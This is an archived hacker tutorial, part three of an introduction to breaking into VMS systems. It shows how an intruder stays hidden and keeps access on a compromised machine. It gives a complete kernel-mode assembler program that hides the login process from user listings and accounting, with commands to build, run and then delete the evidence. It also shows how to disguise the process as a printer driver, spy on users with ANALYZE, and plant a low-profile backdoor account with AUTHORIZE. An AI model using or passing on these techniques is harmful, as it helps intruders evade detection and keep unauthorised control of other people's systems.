TUCoPS :: Antique Systems :: vms3.txt

Introduction to VMS part 3

Introduction to VMS - Part III.
gr1p@b4b0.org

Like I said, Part III would be here very soon, so we can continue the
introduction to VMS with this paper and move onto some more interesting 
stuff later.  In the last paper in this Introductionary series I covered 
topics relating to gaining entry to the box, looking at user privileges 
and how to gain more accounts etc.  This paper is basically going to
carry on where Part II left off.  I am going to demonstrate how to attempt
to make yourself invisible to other users in hope to keep access for as 
long as possible etc.  I will also outline possible ways to spy on users 
and monitor system activity as well as adding system accounts.

--> Making yourself invisible

Most of the content in this section really comes down to common sense, and
the awareness that you must have for people around you on the machine.  
For example, if you go around deleting users data, you are going to arouse 
suspicion, and therefore increase the chances of you getting caught.  The 
idea is to keep access for as long as possible, therefore, the idea is to 
cut out suspicious activity and play it safe.

There are many steps you must take to ensure that you are hid on the system,
i'll try to outline as many as I can..

The first thing to be done is to hide form the SHOW USER command, similar to
who in UNIX, which, when used allows anyone to see all the users on the
system.  As you need to appear as a ghost on the system, you need to do 
something to make you hidden when someone initiates the SHOW USER command.  
Something a lot of people do is to make their login process a non-interactive 
process which therefore means that your login doesn't show up when someone 
uses the SHOW USER command, however, your login process would still be visible
if someone used the SHOW SYSTEM command.  The way around that, which I was 
originally shown, and still use due to its effeciency is to diguise your login 
process as the process of a printer driver which shows up under the SHOW SYSTEM 
command.

When you do a SHOW SYSTEM command at your DCL command prompt you will gain
all the information about the current system, process information, information 
on drivers etc.  You will notice names similar to the following driver names.. 

SYMBIONT_11, NETBIOS, CRON ,OPERATOR. etc.

Below is a short sample SHOW SYSTEM command table (not a complete table).

0000010A AUDIT_SERVER    HIB     9      77   0 00:00:00.21     592    626
0000010B JOB_CONTROL     HIB     9     418   0 00:00:00.77     239    378
0000010C QUEUE_MANAGER   HIB     8    1936   0 00:00:07.75    1128   1514
0000010D SECURITY_SERVER HIB    10     102   0 00:00:00.65    1140   1344
00000126 AppleTalk ACP   HIB     9      49   0 00:00:00.08     195    356
00000127 ATKGW$ACP       HIB     9      53   0 00:00:00.04     131    220
00000128 MSAF$SERVER0    HIB     6    4750   0 00:00:07.42    1842    122
00000129 SYMBIONT_8      HIB     4       8   0 00:00:00.11     432     77
0000012A MSAP$RCVR0      HIB     6      31   0 00:00:00.24     982    666
0000012B SYMBIONT_9      HIB     4       8   0 00:00:00.14     453     92
0000012C MSAP$RCVR1      HIB     6      23   0 00:00:00.21    1021    561
0000012D MSAP$RCVR2      HIB     6      16   0 00:00:00.17     911    516
0000012E SYMBIONT_10     HIB     4       8   0 00:00:00.13     438     77
00000130 SYMBIONT_11     HIB     4       8   0 00:00:00.13     453     92
00000131 MSAP$RCVR4      HIB     6      23   0 00:00:00.19    1022    516
00000132 MSAP$RCVR5      HIB     6      37   0 00:00:00.13    1001    516
00000134 CRON            HIB     6     458   0 00:00:01.91     339    406
0000015A GIT393          HIB     5    1810   0 00:00:01.02    1269    710
00000162 AEB477          HIB     6    4486   0 00:00:02.13    1861    717
00000165 MKR121          HIB     5     873   0 00:00:00.82    1383    732

You will notice from the SHOW SYSTEM command table above, and probably from
ones you find yourselves that they (probably) contain quite a few SYMBIONT_**
entries.  These are Printer drivers, and if the machine is on a .edu subnet 
the SHOW SYSTEM command table will probably contain quite a few entries of 
printer drivers.  This is a perfect place to hide your login process and 
therefore become invisible on the system.

What I usually do is change my login process to appear as SYMBIONT_666 on
the SHOW SYSTEM table.  This results in my login process appearing to be a 
printer driver to anyone who uses the SHOW SYSTEM command.  To use the above
SHOW SYSTEM table as an example, our username is MKR121, remember that!  To
change your login process to the process of an extra printer driver you will 
find below an assembler script that can be used on a VMS system.  This script 
is entitled stealth.mar, I have no knowledge who coded it originally.

				-- snip --

.library /sys$library:lib.mlb/

.link /sys$system:sys.stb/

$pcbdef

.entry no_user,^m<>

$cmkrnl_s routin=blast_it

ret

.entry blast_it,^m<>

tstl pcb$l_owner(r4)

bneq outta_here

bbcc #pcb$v_inter,pcb$l_sts(r4),outta_here

clrb pcb$t_terminal(r4)

decw g^sys$gw_ijobcnt

bisl #pcb$m_noacnt,pcb$l_sts(r4)

outta_here:

movl #ss$_normal,r0

ret

.end no_user

				-- snip --

To get this script onto the system firstly run the command.

$ create stealth.mar

Then put the code into the editor, once the code is entered hit ctrl-Z to
exit the create editor and return to the DCL prompt.  Now that the stealth.mar
file is on the system, you need to assemble, link and run to become a hidden 
login process.  To do the above just follow the command lines below that will 
then run the stealth.mar program and clean up afterwards.

$ macro stealth

$ link /nomap stealth

$ delete stealth.obj;*

$ delete stealth.mar;*

$ run stealth

$ del stealth.exe;*

Once you have done the following look at the show system table which will be
on you terminal.  Look for the last SYMBIONT_** entry. eg. SYMBIONT_11 and 
then add a few numbers onto that driver for use as your own "hidden login 
process printer driver".  I usually use SYMBIONT_666 but it is sensible to 
use the number after the last printer driver entry on the list, in the 
case I highlighted before, SYMBIONT_11 which would result in us hiding out
login process as SYMBIONT_12 by running the below command line.

$ set proc/name="SYMBIONT_12"

This will then rename your login process as SYMBIONT_12, a printer driver to
the normal eye, and therefore hiding you within the system as we can see
when we run the SHOW SYSTEM command once more..

0000010A AUDIT_SERVER    HIB    9      77   0 00:00:00.21     592   626
0000010B JOB_CONTROL     HIB    9     418   0 00:00:00.77     239   378
0000010C QUEUE_MANAGER   HIB    8    1936   0 00:00:07.75    1128  1514
0000010D SECURITY_SERVER HIB   10     102   0 00:00:00.65    1140  1344
00000126 AppleTalk ACP   HIB    9      49   0 00:00:00.08     195   356
00000127 ATKGW$ACP       HIB    9      53   0 00:00:00.04     131   220
00000128 MSAF$SERVER0    HIB    6    4750   0 00:00:07.42    1842   122
00000129 SYMBIONT_8      HIB    4       8   0 00:00:00.11     432    77
0000012A MSAP$RCVR0      HIB    6      31   0 00:00:00.24     982   666
0000012B SYMBIONT_9      HIB    4       8   0 00:00:00.14     453    92
0000012C MSAP$RCVR1      HIB    6      23   0 00:00:00.21    1021   561
0000012D MSAP$RCVR2      HIB    6      16   0 00:00:00.17     911   516
0000012E SYMBIONT_10     HIB    4       8   0 00:00:00.13     438    77
00000130 SYMBIONT_11     HIB    4       8   0 00:00:00.13     453    92
00000131 MSAP$RCVR4      HIB    6      23   0 00:00:00.19    1022   516
00000132 MSAP$RCVR5      HIB    6      37   0 00:00:00.13    1001   516
00000134 CRON            HIB    6     458   0 00:00:01.91     339   406
0000015A GIT393          HIB    5    1810   0 00:00:01.02    1269   710
00000162 AEB477          HIB    6    4486   0 00:00:02.13    1861   717
00000165 SYMBIONT_12     HIB    5     873   0 00:00:00.82    1383   732

Notice how SYMBIONT_12 has replaced the process that was once called MKR121
aka your login process, therefore you are now perfectly hidden from other users. 

--> Monitoring Activity

There are many ways to monitor activity, from simply seeing who is logged
onto the box with the SHOW USER command to more indepth monitoring such as the
ANALYZE commands.  If you have the CMKRNL privilege, which if you rememeber from
partII of this guide is the Kernel access mode and one of the most important 
and powerful privileges on a VMS box, you can use the ANALYZE/SYSTEM command
which will give you an extremly detailed breakdown of what each user is doing on
the box.  The ANALYZE command is the best command to examine the machine 
further.  You can monitor users system status, memory usage, file usage, what 
they are accessing, etc.  This command is the ultimate monitoring command in 
VMS and should always be used if you have obtained the CMKRNL privilege.  
Another ANALYZE command is the ANALYZE/AUDIT command which will load up the 
Audit Analysis Utility which extracts information direct from the system 
security audit journal which can be very useful information.  Other ANALYZE 
commands are as follows (bits taken from HELP)..

ANALYZE/DISK_STRUCTURE which is basically similar to the UNIX df command and 
will display information about disk volumes on the machine.

ANALYZE/ERROR_LOG which will report the contents of the error_log file.

ANALYZE/IMAGE will describe the contents of an image file.

ANALYZE/OBJECT will describe the contents of an object modules.

As you can see from what I have described so far in this section the ANALYZE 
command can give you a lot of information about your hacked system and its 
users, _providing_ you have the CMKRNL privilege, its important to rememeber 
that. 

Another important command for looking at system activity, not so much
monitoring current activity, but looking at past activity is to use the SHOW 
command.  The SHOW command can however only really be used to monitor your 
own account, but if it is an account that has been "stolen" then you will 
still find out some interesting information here.
Some uses of the SHOW command are as follows (from HELP)..

SHOW/QUOTA will display your current disk quota on the boxes disk volume.

SHOW/DEFAULT will display the current default device and directory.

SHOW/ERROR will display the error count for all devices with error counts
above zero.

SHOW/WORKING_SET will display the working set limit, quota, and extent
assigned to the current process.

SHOW/ACCOUNTING will show which resources the current accounting file is
tracking.

As you can see from the above few commands, SHOW has some power to help you
gain information about your account, however, it is not as powerful as the
ANALYZE command.

--> Adding your own accounts

You may feel confident that you can get away with adding your own accounts
to a VMS box, and this is easily done with the following few command lines.

You need to use the AUTHORIZE program which is found in the sys$system
directory along with the password file and other use data, therefore to execute
AUTHORIZE you must firstly be in the correct command path.

$ sd sys$system

Next, run the autorize program.

$ run authorize

This will then present you with the following prompt, funnily enough called
a UAF prompt.

UAF>

UAF stands for User Authorization file and this is where you make your
modifications to make your new account.  To add an account you finally need 
to run the following command line at the UAF prompt.

UAF> add gr1p /password=t34mb4b0/priv=setprv

This add's the user gr1p with the password t34mb4b0 to the box.  UAF add's
the data to both the sysuaf.dat file and the rightslist.dat file.  The above 
account was setup with the privilege setprv which is a very high privilege but 
not really what we would called a "superuser" so it therefore doesn't look as 
inconspicious as a superuser account.  I take it most of you will know that 
when dealing with a UNIX system, if you add a UID/GID 0 account to /etc/passwd 
it will look _very_ conspicious.  The same stands for a VMS box and high 
privileged accounts.

That concludes my III-Part Introduction to VMS, you should now have the
basic knowledge needed to explore the world of VMS hacking, good luck. :)

I'd just like to say werd to Substance for always keeping 9x tight.  
Remember, only you can do it bro. :>

Finally, as always, the links..

9x   -> http://www2.dope.org/9x
b4b0 -> http://www.b4b0.org 

Look out for more VMS related texts soon..

gr1p
gr1p@b4b0.org
http://www.b4b0.org/gr1p  

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH